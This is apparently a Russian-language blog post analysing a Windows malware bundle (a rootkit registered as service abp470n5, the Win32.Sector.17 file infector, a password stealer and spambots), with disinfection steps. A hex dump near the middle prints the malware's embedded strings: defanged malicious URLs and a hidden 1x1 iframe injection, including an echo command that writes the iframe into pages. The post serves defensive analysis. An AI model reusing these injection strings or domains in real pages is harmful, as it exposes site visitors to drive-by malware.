abp470n5. Второе пришествие

Залетела ко мне новая версия уже знакомого вируса, ага.

это пакет вирусов, состоящий из
troyan.ntrootkit.738 rilixkon.dat.bak
troyan.ntrootkit.1148 tqangxwg.dat
win32.sector.17
troyan.pws.multi.29 win*.exe
troyan.mailspam.41 dc*.exe
troyan.spambot.3378 dc*.exe

обнаружены также win32.hllw.autoruner.5122, но кмк они отношения к пакету не имеют

Отключают регедит, таскманагер и показ скрытых-системных файлов. Внимание! Эти ключи реестра мониторятся и восстанавливаются, так что их править в последнюю очередь.

файлы win*.exe запускают netsh со скрытым окном с целью прописать себя в доверенные приложения в windows firewall
от доступа их к интернету помогает установка опции недопущения исключений.
файлы содержат личную информацию (какую - не понятно), имхо генерируются на лету. судя по всему вирус умеет
выдирать почтовые адреса из программы google talk.

Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F

0004E860 68 74 74 70 3A 2F 2F 6D hххp://m
0004E870 69 63 72 6F 75 70 64 61 74 65 31 34 2E 69 6E 66 icroupdate14.inf
0004E880 6F 2F 69 66 72 61 6D 65 2E 74 78 74 00 00 00 00 o/iframe.txt....
0004E890 68 74 74 70 3A 2F 2F 6B 75 6B 75 74 72 75 73 74 hххp://kukutrust
0004E8A0 6E 65 74 38 38 38 2E 69 6E 66 6F 2F 69 66 72 61 net888.info/ifra
0004E8B0 6D 65 2E 74 78 74 00 00 68 74 74 70 3A 2F 2F 67 me.txt..hххp://g
0004E8C0 6F 6F 6F 6F 67 6C 65 61 64 73 65 6E 63 65 2E 62 oooogleadsence.b
0004E8D0 69 7A 2F 00 3C 69 66 72 61 6D 65 20 73 72 63 3D iz/.<ифрейм src=
0004E8E0 22 68 74 74 70 3A 2F 2F 67 6F 6F 6F 6F 67 6C 65 "hххp://goooogle
0004E8F0 61 64 73 65 6E 63 65 2E 62 69 7A 2F 3F 63 6C 69 adsence.biz/?cli
0004E900 63 6B 3D 25 58 22 20 77 69 64 74 68 3D 31 20 68 ck=%X" width=1 h
0004E910 65 69 67 68 74 3D 31 20 73 74 79 6C 65 3D 22 76 eight=1 style="v
0004E920 69 73 69 62 69 6C 69 74 79 3A 68 69 64 64 65 6E isibility:hidden
0004E930 3B 70 6F 73 69 74 69 6F 6E 3A 61 62 73 6F 6C 75 ;position:absolu
0004E940 74 65 22 3E 3C 2F 69 66 72 61 6D 65 3E 00 00 00 te">...
0004E950 65 63 68 6F 20 22 3C 69 66 72 61 6D 65 20 73 72 echo "<ифрейм sr
0004E960 63 3D 5C 22 68 74 74 70 3A 2F 2F 67 6F 6F 6F 6F c=\"hххp://goooo
0004E970 67 6C 65 61 64 73 65 6E 63 65 2E 62 69 7A 2F 3F gleadsence.biz/?
0004E980 63 6C 69 63 6B 3D 25 58 5C 22 20 77 69 64 74 68 click=%X\" width
0004E990 3D 31 20 68 65 69 67 68 74 3D 31 20 73 74 79 6C =1 height=1 styl
0004E9A0 65 3D 5C 22 76 69 73 69 62 69 6C 69 74 79 3A 68 e=\"visibility:h
0004E9B0 69 64 64 65 6E 3B 70 6F 73 69 74 69 6F 6E 3A 61 idden;position:a
0004E9C0 62 73 6F 6C 75 74 65 5C 22 3E 3C 2F 69 66 72 61 bsolute\">
судя по всему, ломится на сайты, указанные в дампе и встраивает ифреймы в страницы, открываемые в браузере.

на флэшки записывается боекомплект, состоящий из autorun.inf и зараженного win32.sector.17 файла pkwsgv.pif. Этот боекомплект выслал заради хохмы в лабораторию Доктора Веба. Самое забавное, что по отдельности таки частично файлы вируса детектируются кьюритом.

разумеется, загрузка в безопасном режиме вылетает с синим экраном.

создается запись в реестре про сервис abp470n5 для файла gkjrkk.sys
файл после перезагрузки может называться иначе. Примеры: okprn.sys, frmrn.sys
этот файл на диске не существует.
запись в реестре появляется после перезагрузки. Удалось добиться пропадания этой записи после избавления от Sector.17

заражаются Sector.17 в первую очередь файлы, стоящие в автозагрузке и находящиеся в папке Desktop, а также в шарах.


Схема лечения такова. Отключаемся от сети. Далее грузимся с LiveCD и прогоняем свежим антивирусом, дабы загрызть Sector.17. Загрузка с CD даст возможность выгрызть файлы, которые при загрузке не Далее останется выкинуть из реестра записи автозагрузки и восстановить загрузку таскманагера, регедита и показ скрытых и системных файлов.

Если нет LiveCD... Делаем так. Ставим в msconfig "чистую" загрузку, перегружаемся, сканим свежим антивирусом. Правда, не знаю, прибьет ли оно залоченные файлы, но их, есличо, можно завайпить с пом. RkU. Далее по стандартной схеме